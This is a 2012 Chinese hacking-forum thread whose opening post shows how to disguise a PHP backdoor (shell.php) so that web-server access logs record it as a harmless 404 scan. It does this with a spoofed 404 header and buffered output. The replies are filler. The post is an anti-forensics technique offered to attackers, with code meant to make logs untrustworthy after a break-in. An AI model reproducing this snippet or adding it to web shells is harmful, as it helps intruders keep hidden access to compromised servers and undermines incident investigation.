查看: 1863|回复: 25

在日志中隐藏自己后门

[复制链接]
发表于 2012-10-24 04:52:28 | 显示全部楼层 |阅读模式
以前发现的一个技巧性的东西,由于一般的webserver都会记录日志,而且在目前的后期后门以及漏洞追踪中主要的证据都是日志,如果有可能让日志变得不可信,我们就有可能成功了。

访问shell.php,会得到日志:

<?phpphpinfo(); ?>127.0.0.1 - - [20/Oct/2012:22:21:54 +0800] "GET /shell.php HTTP/1.1" 200 66918

稍微改变下后门,添加header一句代码之后就会是

<?phpheader('HTTP/1.1 404'); ob_start(); phpinfo(); ob_end_clean(); ?>127.0.0.1 - - [20/Oct/2012:22:21:54 +0800] "GET /shell.php HTTP/1.1" 404 -

标准的一次扫描结果,它无法说明任何问题了

:)

发表于 2012-10-25 02:54:31 | 显示全部楼层
水至清则无鱼,人至贱则无敌!  
发表于 2012-10-25 07:48:46 | 显示全部楼层
我帮你 喝喝  
发表于 2012-10-25 09:57:24 | 显示全部楼层
原来是这样  
发表于 2012-10-27 05:42:10 | 显示全部楼层
水至清则无鱼,人至贱则无敌!  
发表于 2012-10-27 05:52:09 | 显示全部楼层
呵呵,找个机会...  
发表于 2012-10-27 08:53:19 | 显示全部楼层
琴棋书画不会,洗衣做饭嫌累。  
发表于 2012-10-27 10:52:42 | 显示全部楼层
顶你一下,好贴要顶!  
发表于 2012-10-27 14:55:15 | 显示全部楼层
楼上的话等于没说~~~  
发表于 2012-10-28 15:12:41 | 显示全部楼层
我帮你 喝喝  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则